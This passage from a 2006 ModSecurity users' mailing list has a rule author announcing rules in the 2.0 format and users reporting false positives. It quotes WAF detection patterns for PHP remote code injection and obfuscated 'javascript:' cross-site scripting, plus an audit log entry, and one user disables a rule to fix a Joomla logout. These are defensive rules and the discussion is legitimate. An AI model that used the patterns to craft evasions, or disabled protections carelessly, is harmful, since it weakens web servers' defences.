nKtDWgU/S1GdCK4py73I3/Avcg9SL/3Sni8tTYxY1FuMEvyK8Ewxw9B9HKmC6let BXJktMjHfrV9YCPipaEOYaYBek0EkFy7ACxDEj6jUo9FJg88mSL4pZ6veH/dKGwO qnWE5HeD4oPnwwVsE4c3BlK57tFquuw51DgeM2hCMt/MzRp4PHghisCvloG8qDrT 0JZF3kEHOrsOBPwjUvoru+HGu1ooKr1rWuLLueOFySWrtCkSdXAFqe7815TB2wZq x3JyVWNJYt7X/YlhnpTFHWS086xaFiAnsOUHZlZ17E70yxKZXMIk7aBcHMoaw4hv Vn4/03EgbSM= =4p0G -----END PGP SIGNATURE----- From mike at gotroot.com Thu Oct 19 15:37:51 2006 From: mike at gotroot.com (Michael Shinn) Date: Thu, 19 Oct 2006 15:37:51 -0400 Subject: [Modsecurity] Modsecurity 2.0 rules Message-ID: <1161286671.3458.54.camel@localhost.localdomain> Are in the works, and I should have them out this weekend. As many of you know, the format for the rules in 2.0 changed, so I have to rewrite all of the rules (thank god for find and replace, otherwise this would be even more work than it already is) and then do some pretty rigorous testing to make sure they still work properly. I will also be going on vacation this weekend, so I won't be around for few weeks to fix any issues with the 2.0 only rules. To that end, I would recommend you consider the 2.0 only rules as Beta quality until I can get back to respond to bug reports. The old rules for 1.9.x will also be available for download for those that wish to stick with 1.9.x. -- Michael T. Shinn KeyID:0xDAE2EC86 Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86 http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86 Got Root? http://www.gotroot.com modsecurity rules: http://www.modsecurityrules.com Troubleshooting Firewalls: http://troubleshootingfirewalls.com From pmorak at pemocom.com Sun Oct 22 12:41:38 2006 From: pmorak at pemocom.com (Peter Morak) Date: Sun, 22 Oct 2006 18:41:38 +0200 Subject: [Modsecurity] false positive at joomla backend logout Message-ID: <453B9F42.3040402@pemocom.com> hello, first, sorry for my bad english :) after i installed the new rules (apache2) i think i get false positives when a user log out from a joomla (1.0.11) backend (a lot of customers mentioned the error). after i commented out following rule #SecFilterSelective REQUEST_URI "!(/tiki-objectpermissions|aardvarkts/install/index|/do_command|banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|gallery2?/main|ad-?server/adjs)" "chain,id:300018,rev:3,severity:2,msg:'Generic PHP code injection protection via ARGS'" #SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&)" chain #SecFilterSelective ARGS "(ht|f)tps?:/" the logout work again. anyone have this error too? thx peter From mike at gotroot.com Sun Oct 22 15:34:01 2006 From: mike at gotroot.com (Michael Shinn) Date: Sun, 22 Oct 2006 15:34:01 -0400 Subject: [Modsecurity] 2.0 compatible rules out Message-ID: <1161545641.4942.15.camel@localhost.localdomain> I've just updated the rules to the new 2.0 format. Consider these beta rules, as they have not been as widely tested as the 1.9 format rules. If you encounter bugs, please let me know. You can find the 2.0 beta rules here: http://www.gotroot.com/downloads/ftp/mod_security/2.0/ -- Michael T. Shinn KeyID:0xDAE2EC86 Key Fingerprint: 1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86 http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86 Got Root? http://www.gotroot.com modsecurity rules: http://www.modsecurityrules.com Troubleshooting Firewalls: http://troubleshootingfirewalls.com From stevewest15 at gmail.com Sat Oct 28 12:55:58 2006 From: stevewest15 at gmail.com (Steve West) Date: Sat, 28 Oct 2006 12:55:58 -0400 Subject: [Modsecurity] Exclude a Rule w/ no ID...Any free IDs to Use? Message-ID: <45438B9E.3060005@gmail.com> Hi, I'm trying to find out how I can assign an id so I can easily exclude the following rule (by adding the id and /dwmail/compose.php) to the excludes.conf file: Here is the Rule: #cross site scripting stealth attempt to execute Javascript code #may false alarm for some language sets SecFilterSelective REQUEST_URI "!(/index\.php\?module=Blocks&type=admin&func=update|/index\.php\?go=.*&edit=)" chain SecFilter "(((URL|SRC|HREF|LOWSRC)[\s]*=)|(url[\s]*[\(]))[\s]*[\'\"]*[\x09\x0a\x0b\x0c\x0d]*j[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*v[\x09\x0a\x0b\x0c\x0d]*a[\x09\x0a\x0b\x0c\x0d]*s[\x09\x0a\x0b\x0c\x0d]*c[\x09\x0a\x0b\x0c\x0d]*r[\x09\x0a\x0b\x0c\x0d]*i[\x09\x0a\x0b\x0c\x0d]*p[\x09\x0a\x0b\x0c\x0d]*t[\x09\x0a\x0b\x0c\x0d]*[\:]" Here is the false positive: ==f0bd0d77============================== Request: xxx.xxx.xxx.xxx xxx.xxx.xxx.239 - - [27/Oct/2006:20:59:48 -0400] "POST /dwmail/compose.php HTTP/1.1" 500 538 "http://xxx.xxx.xxx.xxx/dwmail/compose.php?sessionid=da39ebd39c7b6489a03c212216c64627" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5))" RUKrg9EI6AoAAA6sCDg "-" ----------------------------------------- -POST /dwmail/compose.php HTTP/1.1 ----------------: ----- ------- Accept: */* Accept-Language: en-us Cache-Control: no-cache Connection: Keep-Alive Content-Length: 6332 Content-Type: multipart/form-data; boundary=---------------------------7d62c0102e02a4 Host: xxx.xxx.xxx.xxx Referer: http://xxx.xxx.xxx.xxx/dwmail/compose.php?sessionid=da39ebd39c7b6489a03c212216c64627 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5)) mod_security-action: 500 mod_security-message: Access denied with code 500. Pattern match "(((URL|SRC|HREF|LOWSRC)[\\s]*=)|(url[\\s]*[\\(]))[\\s]*[\\'\"]*[\\x09\\x0a\\x0b\\x0c\\x0d]*j[\\x09\\x0a\\x0b\\x0c\\x0d]*a[\\x09\\x0a\\x0b\\x0c\\x0d]*v[\\x09\\x0a\\x0b\\x0c\\x0d]*a[\\x09\\x0a\\x0b\\x0c\\x0d]*s[\\x09\\x0a\\x0b\\x0c\\x0d]*c[\\x09\\x0a\\x0b\\x0c\\x0d]*r[\\x09\\x0a\\x0b\\x0c\\x0d]*i[\\x09\\x0a\\x0b\\x0c\\x0d]*p[\\x09\\x0a\\x0b\\x0c\\x0d]*t[\\x09\\x0a\\x0b\\x0c\\x0d]*[\\:]" at POST_PAYLOAD [severity "EMERGENCY"] ------- thx, SW